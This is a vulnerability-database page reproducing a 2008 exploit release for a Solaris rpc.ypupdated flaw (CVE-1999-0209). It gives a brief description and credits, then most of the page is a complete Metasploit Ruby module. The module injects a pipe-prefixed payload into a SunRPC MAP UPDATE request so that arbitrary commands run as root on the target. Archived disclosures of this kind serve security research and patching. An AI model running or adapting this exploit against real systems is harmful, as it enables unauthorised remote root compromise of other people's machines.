Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sun Solaris <= 10 - rpc.ypupdated Remote Root Exploit (meta)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 24 Views

Sun Solaris rpc.ypupdated Remote Root Exploi

Code

                                                                      ____      ____     __    __
                     /    \    /    \   |  |  |  |
        ----====####/  /\__\##/  /\  \##|  |##|  |####====----
                   |  |      |  |__|  | |  |  |  |
                   |  |  ___ |   __   | |  |  |  |
  ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
                     \____/  |__|  |__|  \______/
                                                     
                    Computer Academic Underground
                        http://www.caughq.org
                            Exploit Code

===============/========================================================
Exploit ID:     CAU-EX-2008-0001
Release Date:   2008.04.04
Title:          ypupdated_exec.rb
Description:    Solaris ypupdated Command Execution
Tested:         Solaris x86/sparc 10, sparc 9, 8, 2.7
Attributes:     Remote, NULL Auth, Elevated Privileges, Metasploit
Exploit URL:    http://www.caughq.org/exploits/CAU-EX-2008-0001.txt
Author/Email:   I)ruid &#60;druid (@) caughq.org&#62;
===============/========================================================

Description
===========

This exploit targets a weakness in the way the ypupdated RPC application
uses the command shell when handling a MAP UPDATE request.  Extra
commands may be launched through this command shell, which runs as root
on the remote host, by passing commands in the format &#39;|&#60;command&#62;&#39;.


Credits
=======

Josh D. &#60;[email protected]&#62; from Avalon Security Research is
credited with originally discovering this vulnerability.

This Metasploit exploit module was modeled after kcope&#39;s exploit
released to Milw0rm on 2008.03.20.


References
==========

http://osvdb.org/displayvuln.php?osvdb_id=11517
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0209
http://www.securityfocus.com/bid/1749/info
http://www.milw0rm.com/exploits/5282


Metasploit
==========

require &#39;msf/core&#39;

module Msf

class Exploits::Solaris::Sunrpc::YPUpdateDExec &#60; Msf::Exploit::Remote

	include Exploit::Remote::SunRPC

	def initialize(info = {})
		super(update_info(info,	
			&#39;Name&#39;           =&#62; &#39;Solaris ypupdated Command Execution&#39;,
			&#39;Description&#39;    =&#62; %q{
				This exploit targets a weakness in the way the ypupdated RPC
				application uses the command shell when handling a MAP UPDATE
				request.  Extra commands may be launched through this command
				shell, which runs as root on the remote host, by passing
				commands in the format &#39;|&#60;command&#62;&#39;.

				Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
				ypupdated is started with the &#39;-i&#39; command-line option.
			},
			&#39;Author&#39;         =&#62; [ &#39;I)ruid &#60;[email protected]&#62;&#39; ],
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Version&#39;        =&#62; &#39;$Revision: 4498 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[&#39;BID&#39;, &#39;1749&#39;],
					[&#39;CVE&#39;, &#39;1999-0209&#39;],
					[&#39;OSVDB&#39;, &#39;11517&#39;],
				],
			&#39;Privileged&#39;     =&#62; true,
			&#39;Platform&#39;       =&#62; [&#39;unix&#39;, &#39;solaris&#39;],
			&#39;Arch&#39;           =&#62; ARCH_CMD,
			&#39;Payload&#39;        =&#62;
				{
					&#39;Space&#39;    =&#62; 1024,
					&#39;DisableNops&#39; =&#62; true,
				},
			&#39;Targets&#39;        =&#62; [ [&#39;Automatic&#39;, { }], ],
			&#39;DefaultTarget&#39; =&#62; 0
		))

		register_options(
			[
				OptString.new(&#39;HOSTNAME&#39;, [false, &#39;Remote hostname&#39;, &#39;localhost&#39;]),
				OptInt.new(&#39;GID&#39;, [false, &#39;GID to emulate&#39;, 0]),
				OptInt.new(&#39;UID&#39;, [false, &#39;UID to emulate&#39;, 0])
			], self.class
		)
	end

	def exploit
		hostname  = datastore[&#39;HOSTNAME&#39;]
		program   = 100028
		progver   = 1
		procedure = 1

		print_status &#39;Sending PortMap request for ypupdated program&#39;
		pport = sunrpc_create(&#39;udp&#39;, program, progver)

		print_status &#34;Sending MAP UPDATE request with command &#39;#{payload.encoded}&#39;&#34;
		print_status &#39;Waiting for response...&#39;
		sunrpc_authunix(hostname, datastore[&#39;UID&#39;], datastore[&#39;GID&#39;], [])
		command = &#39;|&#39; + payload.encoded
		msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
		sunrpc_call(procedure, msg)

		sunrpc_destroy

		print_good &#39;No Errors, appears to have succeeded!&#39;
	rescue ::Rex::Proto::SunRPC::RPCTimeout
		print_status &#39;Warning: &#39; + $!
		print_status &#39;Exploit may or may not have succeeded.&#39;
	end

end
end	

# milw0rm.com [2008-04-04]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
solarisypupdatedremote root
24